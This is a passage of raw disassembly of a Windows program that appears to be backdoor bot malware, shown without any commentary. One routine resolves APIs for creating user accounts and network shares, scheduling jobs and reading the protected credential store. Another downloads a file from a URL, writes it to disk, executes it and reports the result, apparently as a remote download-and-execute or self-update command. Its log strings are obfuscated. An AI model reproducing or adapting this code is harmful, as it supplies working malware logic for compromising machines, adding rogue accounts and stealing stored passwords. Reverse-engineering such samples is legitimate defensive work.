mov dword_456DDC, eax
call esi ; dword_437030
cmp dword_456E18, ebx
mov ecx, dword_456E88
mov dword_456F50, eax
jz short loc_417D0B
cmp dword_456D94, ebx
jz short loc_417D0B
cmp dword_456ED0, ebx
jz short loc_417D0B
cmp dword_456E5C, ebx
jz short loc_417D0B
cmp dword_456EE0, ebx
jz short loc_417D0B
cmp ecx, ebx
jz short loc_417D0B
cmp dword_456DD4, ebx
jz short loc_417D0B
cmp dword_456DC8, ebx
jz short loc_417D0B
cmp dword_456DDC, ebx
jz short loc_417D0B
cmp eax, ebx
jnz short loc_417D15
loc_417D0B: ; CODE XREF: sub_41729C+A2D�j
; sub_41729C+A35�j ...
mov dword_457030, 1
loc_417D15: ; CODE XREF: sub_41729C+A6D�j
cmp ecx, ebx
jz short loc_417D4A
push ebx
push ebx
push ebx
push ebx
push offset aMozilla5_0 ; "Mozilla/5.0"
call ecx ; dword_456E88
cmp eax, ebx
mov dword_456EB0, eax
jnz short loc_417D4A
jmp short loc_417D44
; ---------------------------------------------------------------------------
loc_417D2F: ; CODE XREF: sub_41729C+97F�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457034, eax
mov dword_457030, 1
loc_417D44: ; CODE XREF: sub_41729C+A91�j
mov dword_456EB0, ebx
loc_417D4A: ; CODE XREF: sub_41729C+A7B�j
; sub_41729C+A8F�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_417D94
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; dword_437030
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_456E74, eax
call esi ; dword_437030
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_456FF8, eax
call esi ; dword_437030
cmp dword_456E74, ebx
mov dword_456DF0, eax
jz short loc_417D9F
cmp dword_456FF8, ebx
jz short loc_417D9F
cmp eax, ebx
jnz short loc_417DA9
jmp short loc_417D9F
; ---------------------------------------------------------------------------
loc_417D94: ; CODE XREF: sub_41729C+AB9�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_45703C, eax
loc_417D9F: ; CODE XREF: sub_41729C+AE8�j
; sub_41729C+AF0�j ...
mov dword_457038, 1
loc_417DA9: ; CODE XREF: sub_41729C+AF4�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz loc_417E9F
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; dword_437030
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_456DC0, eax
call esi ; dword_437030
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_456D9C, eax
call esi ; dword_437030
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_456E20, eax
call esi ; dword_437030
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_456E64, eax
call esi ; dword_437030
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_456FC0, eax
call esi ; dword_437030
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_456E0C, eax
call esi ; dword_437030
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_456DA4, eax
call esi ; dword_437030
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_456D98, eax
call esi ; dword_437030
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_456E40, eax
call esi ; dword_437030
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_456F78, eax
call esi ; dword_437030
cmp dword_456DC0, ebx
mov dword_456F28, eax
jz short loc_417EAA
cmp dword_456D9C, ebx
jz short loc_417EAA
cmp dword_456E20, ebx
jz short loc_417EAA
cmp dword_456E64, ebx
jz short loc_417EAA
cmp dword_456FC0, ebx
jz short loc_417EAA
cmp dword_456E0C, ebx
jz short loc_417EAA
cmp dword_456DA4, ebx
jz short loc_417EAA
cmp dword_456D98, ebx
jz short loc_417EAA
cmp dword_456E40, ebx
jz short loc_417EAA
cmp dword_456F78, ebx
jz short loc_417EAA
cmp eax, ebx
jnz short loc_417EB4
jmp short loc_417EAA
; ---------------------------------------------------------------------------
loc_417E9F: ; CODE XREF: sub_41729C+B18�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457044, eax
loc_417EAA: ; CODE XREF: sub_41729C+BB3�j
; sub_41729C+BBB�j ...
mov dword_457040, 1
loc_417EB4: ; CODE XREF: sub_41729C+BFF�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_417EE9
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; dword_437030
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_456DF4, eax
call esi ; dword_437030
cmp dword_456DF4, ebx
mov dword_456F0C, eax
jz short loc_417EF4
cmp eax, ebx
jnz short loc_417EFE
jmp short loc_417EF4
; ---------------------------------------------------------------------------
loc_417EE9: ; CODE XREF: sub_41729C+C23�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_45704C, eax
loc_417EF4: ; CODE XREF: sub_41729C+C45�j
; sub_41729C+C4B�j
mov dword_457048, 1
loc_417EFE: ; CODE XREF: sub_41729C+C49�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz loc_417F91
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; dword_437030
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_456FAC, eax
call esi ; dword_437030
push offset aGetiftable ; "GetIfTable"
push edi
mov dword_456FA8, eax
call esi ; dword_437030
push offset aGettcptable ; "GetTcpTable"
push edi
mov dword_456EDC, eax
call esi ; dword_437030
push offset aGetudptable ; "GetUdpTable"
push edi
mov dword_456EF4, eax
call esi ; dword_437030
cmp dword_456FAC, ebx
mov dword_456F84, eax
jz short loc_417F74
cmp dword_456FA8, ebx
jz short loc_417F74
cmp dword_456EDC, ebx
jz short loc_417F74
cmp eax, ebx
jz short loc_417F74
cmp dword_456EF4, ebx
jnz short loc_417F7E
loc_417F74: ; CODE XREF: sub_41729C+CBA�j
; sub_41729C+CC2�j ...
mov dword_457050, 1
loc_417F7E: ; CODE XREF: sub_41729C+CD6�j
push offset aGetnetworkpara ; "GetNetworkParams"
push edi
call esi ; dword_437030
cmp eax, ebx
mov dword_456E94, eax
jnz short loc_417FA6
jmp short loc_417F9C
; ---------------------------------------------------------------------------
loc_417F91: ; CODE XREF: sub_41729C+C6D�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457058, eax
loc_417F9C: ; CODE XREF: sub_41729C+CF3�j
mov dword_457050, 1
loc_417FA6: ; CODE XREF: sub_41729C+CF1�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_418005
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; dword_437030
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_456FE0, eax
call esi ; dword_437030
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_456FD8, eax
call esi ; dword_437030
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_456F90, eax
call esi ; dword_437030
cmp dword_456FE0, ebx
mov dword_456E14, eax
jz short loc_418010
cmp dword_456FD8, ebx
jz short loc_418010
cmp dword_456F90, ebx
jz short loc_418010
cmp eax, ebx
jnz short loc_41801A
jmp short loc_418010
; ---------------------------------------------------------------------------
loc_418005: ; CODE XREF: sub_41729C+D15�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457060, eax
loc_418010: ; CODE XREF: sub_41729C+D51�j
; sub_41729C+D59�j ...
mov dword_45705C, 1
loc_41801A: ; CODE XREF: sub_41729C+D65�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_41804F
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; dword_437030
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_456E54, eax
call esi ; dword_437030
cmp dword_456E54, ebx
mov dword_456FA4, eax
jz short loc_41805A
cmp eax, ebx
jnz short loc_418064
jmp short loc_41805A
; ---------------------------------------------------------------------------
loc_41804F: ; CODE XREF: sub_41729C+D89�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457068, eax
loc_41805A: ; CODE XREF: sub_41729C+DAB�j
; sub_41729C+DB1�j
mov dword_457064, 1
loc_418064: ; CODE XREF: sub_41729C+DAF�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_4180ED
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; dword_437030
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_456F58, eax
call esi ; dword_437030
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_456FB8, eax
call esi ; dword_437030
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_456EC8, eax
call esi ; dword_437030
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_456E6C, eax
call esi ; dword_437030
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_456F3C, eax
call esi ; dword_437030
cmp dword_456F58, ebx
mov dword_456E7C, eax
jz short loc_4180F8
cmp dword_456FB8, ebx
jz short loc_4180F8
cmp dword_456EC8, ebx
jz short loc_4180F8
cmp dword_456E6C, ebx
jz short loc_4180F8
cmp dword_456F3C, ebx
jz short loc_4180F8
cmp eax, ebx
jnz short loc_418102
jmp short loc_4180F8
; ---------------------------------------------------------------------------
loc_4180ED: ; CODE XREF: sub_41729C+DD3�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457070, eax
loc_4180F8: ; CODE XREF: sub_41729C+E29�j
; sub_41729C+E31�j ...
mov dword_45706C, 1
loc_418102: ; CODE XREF: sub_41729C+E4D�j
push offset aPsapi_dll ; "psapi.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_418177
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push edi
call esi ; dword_437030
push offset aGetmodulebasen ; "GetModuleBaseNameA"
push edi
mov dword_456EC4, eax
call esi ; dword_437030
push offset aEnumprocessmod ; "EnumProcessModules"
push edi
mov dword_456E00, eax
call esi ; dword_437030
push offset aEnumprocesses ; "EnumProcesses"
push edi
mov dword_456ECC, eax
call esi ; dword_437030
push offset aGetprocessmemo ; "GetProcessMemoryInfo"
push edi
mov dword_456F10, eax
call esi ; dword_437030
cmp dword_456E00, ebx
mov dword_456F80, eax
jz short loc_41816C
cmp dword_456ECC, ebx
jz short loc_41816C
cmp dword_456F10, ebx
jz short loc_41816C
cmp eax, ebx
jnz short loc_41818C
loc_41816C: ; CODE XREF: sub_41729C+EBA�j
; sub_41729C+EC2�j ...
xor edi, edi
inc edi
mov dword_45707C, edi
jmp short loc_41818F
; ---------------------------------------------------------------------------
loc_418177: ; CODE XREF: sub_41729C+E71�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457080, eax
mov dword_45707C, 1
loc_41818C: ; CODE XREF: sub_41729C+ECE�j
xor edi, edi
inc edi
loc_41818F: ; CODE XREF: sub_41729C+ED9�j
push offset aPstorec_dll ; "pstorec.dll"
call ebp ; dword_437034
cmp eax, ebx
jz short loc_4181AD
push offset aPstorecreatein ; "PStoreCreateInstance"
push eax
call esi ; dword_437030
cmp eax, ebx
mov dword_456EEC, eax
jnz short loc_4181BE
jmp short loc_4181B8
; ---------------------------------------------------------------------------
loc_4181AD: ; CODE XREF: sub_41729C+EFC�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457088, eax
loc_4181B8: ; CODE XREF: sub_41729C+F0F�j
mov dword_457084, edi
loc_4181BE: ; CODE XREF: sub_41729C+F0D�j
push offset aShlwapi_dll ; "shlwapi.dll"
call ebp ; dword_437034
cmp eax, ebx
jz short loc_4181DC
push offset aPathremovefile ; "PathRemoveFileSpecA"
push eax
call esi ; dword_437030
cmp eax, ebx
mov dword_456E8C, eax
jnz short loc_4181ED
jmp short loc_4181E7
; ---------------------------------------------------------------------------
loc_4181DC: ; CODE XREF: sub_41729C+F2B�j
call dword_43716C ; RtlGetLastWin32Error
mov dword_457098, eax
loc_4181E7: ; CODE XREF: sub_41729C+F3E�j
mov dword_457094, edi
loc_4181ED: ; CODE XREF: sub_41729C+F3C�j
mov eax, edi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41729C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4181F4 proc near ; DATA XREF: sub_40A938+56AF�o
; sub_40A938+5942�o
var_2BE4 = byte ptr -2BE4h
var_4D4 = byte ptr -4D4h
var_3D0 = byte ptr -3D0h
var_330 = byte ptr -330h
var_2B8 = byte ptr -2B8h
var_240 = byte ptr -240h
var_13C = dword ptr -13Ch
var_110 = dword ptr -110h
var_10C = word ptr -10Ch
var_F8 = byte ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = byte ptr -0F0h
var_88 = qword ptr -88h
var_7C = qword ptr -7Ch
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = qword ptr -20h
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2BE4h
call sub_429A90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_F4]
rep movsd
xor edi, edi
push 9Fh
push [ebp+var_6C]
inc edi
mov [eax+0BCh], edi
mov eax, [ebp+var_F4]
mov [ebp+arg_0], eax
lea eax, [ebp+var_3D0]
push eax
call sub_429C40
push 104h
lea eax, [ebp+var_240]
push [ebp+var_68]
push eax
call sub_429C40
add esp, 18h
xor ebx, ebx
lea eax, [ebp+var_3D0]
push ebx
push 80000300h
push ebx
push ebx
push eax
push dword_456EB0
call dword_456DD4 ; InternetOpenUrlA
cmp eax, ebx
mov [ebp+var_2C], eax
jz loc_4188EF
push ebx
push ebx
push 2
push ebx
push ebx
lea eax, [ebp+var_240]
push 40000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, edi
mov dword ptr [ebp+var_20+4], eax
jnb short loc_418316
cmp [ebp+var_40], ebx
mov edi, offset aHuudgYqzdz ; "HuuDG/YQZDz/"
mov esi, offset aSCouldnTOpenFi ; "%s Couldn't open file for writing: %s."
jnz short loc_4182D3
cmp [ebp+var_3C], ebx
jnz short loc_4182D8
cmp [ebp+var_60], ebx
mov eax, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
jnz short loc_4182B8
mov eax, edi
loc_4182B8: ; CODE XREF: sub_4181F4+C0�j
lea ecx, [ebp+var_240]
push ecx
push eax
lea eax, [ebp+var_F0]
push esi
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 14h
loc_4182D3: ; CODE XREF: sub_4181F4+B1�j
cmp [ebp+var_3C], ebx
jz short loc_4182FD
loc_4182D8: ; CODE XREF: sub_4181F4+B6�j
cmp [ebp+var_60], ebx
jz short loc_4182E2
mov edi, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
loc_4182E2: ; CODE XREF: sub_4181F4+E7�j
lea eax, [ebp+var_240]
push eax
push edi
lea eax, [ebp+var_F0]
push esi
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 14h
loc_4182FD: ; CODE XREF: sub_4181F4+E2�j
push [ebp+var_2C]
call dword_456F50 ; InternetCloseHandle
push [ebp+var_70]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
loc_418316: ; CODE XREF: sub_4181F4+A2�j
mov esi, dword_437184
mov [ebp+var_4], ebx
call esi ; dword_437184
mov edi, 7D000h
mov dword ptr [ebp+var_C+4], eax
push edi
call sub_4296E8
pop ecx
mov [ebp+var_30], eax
loc_418333: ; CODE XREF: sub_4181F4+1B9�j
push 2710h
lea eax, [ebp+var_2BE4]
push ebx
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_2BE4]
push 2710h
push eax
push [ebp+var_2C]
call dword_456DDC ; InternetReadFile
lea eax, [ebp+var_F8]
push ebx
push eax
lea eax, [ebp+var_2BE4]
push [ebp+var_18]
push eax
push dword ptr [ebp+var_20+4]
call dword_437078 ; WriteFile
mov ecx, [ebp+var_4]
cmp ecx, edi
jnb short loc_4183A5
mov eax, edi
sub eax, ecx
cmp eax, [ebp+var_18]
jbe short loc_41838F
mov eax, [ebp+var_18]
loc_41838F: ; CODE XREF: sub_4181F4+196�j
push eax
lea eax, [ebp+var_2BE4]
push eax
mov eax, [ebp+var_30]
add eax, ecx
push eax
call sub_429350
add esp, 0Ch
loc_4183A5: ; CODE XREF: sub_4181F4+18D�j
mov eax, [ebp+var_18]
add [ebp+var_4], eax
cmp eax, ebx
ja short loc_418333
call esi ; dword_437184
sub eax, dword ptr [ebp+var_C+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_30]
div ecx
xor edx, edx
mov ecx, eax
mov eax, [ebp+var_4]
inc ecx
div ecx
mov dword ptr [ebp+var_C+4], eax
call sub_429822
pop ecx
push dword ptr [ebp+var_20+4]
call dword_437044 ; CloseHandle
push [ebp+var_2C]
call dword_456F50 ; InternetCloseHandle
cmp [ebp+var_40], ebx
mov edi, offset aHuudgYqzdz ; "HuuDG/YQZDz/"
jnz short loc_418457
cmp [ebp+var_3C], ebx
jnz short loc_41845C
cmp [ebp+var_60], ebx
mov eax, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
jnz short loc_418400
mov eax, edi
loc_418400: ; CODE XREF: sub_4181F4+208�j
mov ecx, dword ptr [ebp+var_C+4]
mov dword ptr [ebp+var_20+4], ebx
mov dword ptr [ebp+var_20], ecx
push ecx
fild [ebp+var_20]
push ecx
lea ecx, [ebp+var_240]
mov dword ptr [ebp+var_20+4], ebx
fmul dbl_437328
fstp [esp+7Ch+var_7C]
push ecx
mov ecx, [ebp+var_4]
mov dword ptr [ebp+var_20], ecx
push ecx
fild [ebp+var_20]
push ecx
fmul dbl_437328
fstp [esp+88h+var_88]
push offset aRy6iq0udbph ; "RY6IQ0UDbPh/"
push offset a8cbgoRjryr_ ; "8CBGO/rJRYr."
push eax
lea eax, [ebp+var_F0]
push offset aSSS_1fkbToS@_1 ; "%s %s %s: %.1fKB to: %s @ %.1fKB/sec."
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 2Ch
loc_418457: ; CODE XREF: sub_4181F4+1F9�j
cmp [ebp+var_3C], ebx
jz short loc_4184BF
loc_41845C: ; CODE XREF: sub_4181F4+1FE�j
cmp [ebp+var_60], ebx
mov eax, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
jnz short loc_418468
mov eax, edi
loc_418468: ; CODE XREF: sub_4181F4+270�j
mov ecx, dword ptr [ebp+var_C+4]
mov dword ptr [ebp+var_C+4], ebx
mov dword ptr [ebp+var_C], ecx
push ecx
fild [ebp+var_C]
push ecx
lea ecx, [ebp+var_240]
mov dword ptr [ebp+var_C+4], ebx
fmul dbl_437328
fstp [esp+7Ch+var_7C]
push ecx
mov ecx, [ebp+var_4]
mov dword ptr [ebp+var_C], ecx
push ecx
fild [ebp+var_C]
push ecx
fmul dbl_437328
fstp [esp+88h+var_88]
push offset aRy6iq0udbph ; "RY6IQ0UDbPh/"
push offset a8cbgoRjryr_ ; "8CBGO/rJRYr."
push eax
lea eax, [ebp+var_F0]
push offset aSSS_1fkbToS@_1 ; "%s %s %s: %.1fKB to: %s @ %.1fKB/sec."
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 2Ch
loc_4184BF: ; CODE XREF: sub_4181F4+266�j
cmp [ebp+var_60], ebx
jnz loc_4187DB
cmp [ebp+var_5C], ebx
jz loc_418964
mov eax, [ebp+var_58]
push 104h
mov dword ptr [ebp+var_C+4], eax
lea eax, [ebp+var_240]
push eax
lea eax, [ebp+var_4D4]
push eax
call sub_429C40
add esp, 0Ch
lea eax, [ebp+var_4D4]
push eax
call dword_456E8C ; PathRemoveFileSpecA
test eax, eax
jnz short loc_418560
cmp [ebp+var_40], ebx
mov esi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
jnz short loc_418532
cmp [ebp+var_3C], ebx
jnz short loc_41853B
call dword_43716C ; RtlGetLastWin32Error
push eax
push esi
push edi
lea eax, [ebp+var_F0]
push offset aSCouldnTParseP ; "%s Couldn't parse path, %s: <%d>"
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 18h
loc_418532: ; CODE XREF: sub_4181F4+317�j
cmp [ebp+var_3C], ebx
jz loc_41863A
loc_41853B: ; CODE XREF: sub_4181F4+31C�j
call dword_43716C ; RtlGetLastWin32Error
push eax
push esi
push edi
lea eax, [ebp+var_F0]
push offset aSCouldnTParseP ; "%s Couldn't parse path, %s: <%d>"
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 18h
jmp loc_41863A
; ---------------------------------------------------------------------------
loc_418560: ; CODE XREF: sub_4181F4+30D�j
push 44h
lea eax, [ebp+var_13C]
push ebx
push eax
call sub_429690
push 10h
lea eax, [ebp+var_28]
push ebx
push eax
call sub_429690
mov eax, dword ptr [ebp+var_C+4]
add esp, 18h
neg eax
sbb eax, eax
mov [ebp+var_13C], 44h
and al, 0FBh
mov [ebp+var_110], 1
add eax, 5
mov [ebp+var_10C], ax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_13C]
push eax
lea eax, [ebp+var_4D4]
push eax
push ebx
push ebx
push ebx
push ebx
lea eax, [ebp+var_240]
push ebx
push eax
push ebx
call dword_437188 ; CreateProcessA
test eax, eax
jnz short loc_418644
cmp [ebp+var_40], ebx
mov esi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
jnz short loc_418609
cmp [ebp+var_3C], ebx
jnz short loc_41860E
call dword_43716C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_240]
push esi
push eax
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push edi
lea eax, [ebp+var_F0]
push offset aSSToCreateProc ; "%s %s to create process: \"%s\", %s: <%d>"...
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 20h
loc_418609: ; CODE XREF: sub_4181F4+3E2�j
cmp [ebp+var_3C], ebx
jz short loc_41863A
loc_41860E: ; CODE XREF: sub_4181F4+3E7�j
call dword_43716C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_240]
push esi
push eax
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push edi
lea eax, [ebp+var_F0]
push offset aSSToCreateProc ; "%s %s to create process: \"%s\", %s: <%d>"...
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 20h
loc_41863A: ; CODE XREF: sub_4181F4+341�j
; sub_4181F4+367�j ...
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_418644: ; CODE XREF: sub_4181F4+3D8�j
call esi ; dword_437184
cmp [ebp+var_40], ebx
mov dword ptr [ebp+var_C+4], eax
jnz short loc_418675
cmp [ebp+var_3C], ebx
jnz short loc_41867A
push dword ptr [ebp+var_20]
lea eax, [ebp+var_240]
push eax
push edi
lea eax, [ebp+var_F0]
push offset aSCreatedProces ; "%s Created process: \"%s\", PID: <%d>"
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 18h
loc_418675: ; CODE XREF: sub_4181F4+458�j
cmp [ebp+var_3C], ebx
jz short loc_41869C
loc_41867A: ; CODE XREF: sub_4181F4+45D�j
push dword ptr [ebp+var_20]
lea eax, [ebp+var_240]
push eax
push edi
lea eax, [ebp+var_F0]
push offset aSCreatedProces ; "%s Created process: \"%s\", PID: <%d>"
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 18h
loc_41869C: ; CODE XREF: sub_4181F4+484�j
cmp [ebp+var_44], ebx
jz loc_4187B6
push 0FFFFFFFFh
push [ebp+var_28]
call dword_43707C ; WaitForSingleObject
call esi ; dword_437184
sub eax, dword ptr [ebp+var_C+4]
xor edx, edx
mov ecx, 3E8h
push 3Ch
div ecx
xor edx, edx
mov ecx, 15180h
pop esi
mov [ebp+var_2B8], bl
div ecx
mov ecx, 0E10h
mov eax, edx
xor edx, edx
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
cmp ecx, ebx
mov esi, edx
mov dword ptr [ebp+var_C+4], eax
jbe short loc_418724
cmp ecx, 1
mov eax, offset aHour ; " hour"
jz short loc_4186FB
mov eax, offset aHours ; " hours"
loc_4186FB: ; CODE XREF: sub_4181F4+500�j
push eax
push ecx
lea eax, [ebp+var_330]
push offset aDS ; " %d%s"
push eax
call sub_429A33
lea eax, [ebp+var_330]
push eax
lea eax, [ebp+var_2B8]
push eax
call sub_42A510
add esp, 18h
loc_418724: ; CODE XREF: sub_4181F4+4F6�j
push esi
lea eax, [ebp+var_330]
push dword ptr [ebp+var_C+4]
push offset a_2d_2d ; " %.2d:%.2d"
push eax
call sub_429A33
lea eax, [ebp+var_330]
push eax
lea eax, [ebp+var_2B8]
push eax
call sub_42A510
add esp, 18h
cmp [ebp+var_3C], ebx
mov esi, offset aSProcessSSTota ; "%s Process %s: \"%s\", Total %s Time: %s."...
jnz short loc_41878A
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_240]
push offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push eax
push offset aSfe3h0kclgx0 ; "SFe3H0kCLgx0"
push edi
lea eax, [ebp+var_F0]
push esi
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 20h
cmp [ebp+var_3C], ebx
jz short loc_4187B6
loc_41878A: ; CODE XREF: sub_4181F4+563�j
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_240]
push offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push eax
push offset aSfe3h0kclgx0 ; "SFe3H0kCLgx0"
push edi
lea eax, [ebp+var_F0]
push esi
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 20h
loc_4187B6: ; CODE XREF: sub_4181F4+4AB�j
; sub_4181F4+594�j
cmp [ebp+var_28], ebx
jz short loc_4187C4
push [ebp+var_28]
call dword_437044 ; CloseHandle
loc_4187C4: ; CODE XREF: sub_4181F4+5C5�j
cmp [ebp+var_24], ebx
jz loc_418964
push [ebp+var_24]
call dword_437044 ; CloseHandle
jmp loc_418964
; ---------------------------------------------------------------------------
loc_4187DB: ; CODE XREF: sub_4181F4+2CE�j
push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_429690
push 44h
lea eax, [ebp+var_13C]
pop esi
push esi
push ebx
push eax
call sub_429690
add esp, 18h
lea eax, [ebp+var_14]
mov [ebp+var_13C], esi
mov [ebp+var_10C], bx
push eax
lea eax, [ebp+var_13C]
push eax
push ebx
push ebx
push 28h
push ebx
push ebx
lea eax, [ebp+var_240]
push ebx
push eax
push ebx
call dword_437188 ; CreateProcessA
cmp eax, 1
jnz short loc_418881
xor eax, eax
cmp [ebp+var_54], 1
setz al
push eax
push 1
call sub_427CE1
mov esi, dword_43718C
pop ecx
pop ecx
push 7D0h
call esi ; dword_43718C
call sub_4234DB
push 64h
call esi ; dword_43718C
push offset a3un9w_temux_5y ; "3Un9W.TEMuX.5ythl/YiVnR/J9IiO.VPA7i1"
push [ebp+arg_0]
call sub_41C9EE
pop ecx
pop ecx
push 3E8h
call esi ; dword_43718C
mov ecx, [ebp+arg_0]
call sub_41C9BC
call dword_456E38 ; WSACleanup
push ebx
call dword_4370C4 ; ExitProcess
loc_418881: ; CODE XREF: sub_4181F4+637�j
cmp [ebp+var_40], ebx
mov esi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
mov edi, offset aSSSSExecutingF ; "%s %s %s: %s executing file: %s."
jnz short loc_4188BA
lea eax, [ebp+var_240]
push eax
push esi
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push offset aW3nki_guvjx ; "w3NKI.gUvJx/"
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
lea eax, [ebp+var_F0]
push edi
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 20h
loc_4188BA: ; CODE XREF: sub_4181F4+69A�j
cmp [ebp+var_3C], ebx
jz loc_418964
lea eax, [ebp+var_240]
push eax
push esi
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push offset aW3nki_guvjx ; "w3NKI.gUvJx/"
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
lea eax, [ebp+var_F0]
push edi
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 20h
jmp short loc_418964
; ---------------------------------------------------------------------------
loc_4188EF: ; CODE XREF: sub_4181F4+7F�j
cmp [ebp+var_40], ebx
mov esi, dword_43716C
mov edi, offset aHuudgYqzdz ; "HuuDG/YQZDz/"
jnz short loc_418935
cmp [ebp+var_3C], ebx
jnz short loc_41893A
cmp [ebp+var_60], ebx
mov dword ptr [ebp+var_C+4], offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
jnz short loc_418913
mov dword ptr [ebp+var_C+4], edi
